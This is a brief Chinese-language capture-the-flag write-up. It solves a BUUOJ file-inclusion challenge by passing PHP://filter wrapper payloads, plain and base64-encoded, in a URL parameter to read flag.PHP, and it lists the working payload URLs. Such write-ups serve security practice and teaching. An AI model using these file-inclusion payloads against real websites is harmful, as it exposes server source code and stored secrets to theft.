进入靶场：

根据题目提示的include，想到使用PHP://filter读取文件

读取文件payload：

# 明文读取
index.PHP?file1=PHP://filter/resource=file.txt

# 编码读取
index.PHP?file1=PHP://filter/read=convert.base64-encode/resource=file.txt

构造payload：

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=PHP://filter/resource=flag.PHP

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=PHP://filter/read=convert.base64-encode/resource=flag.PHP

 明文读取无效，尝试编码读取

 得到flag！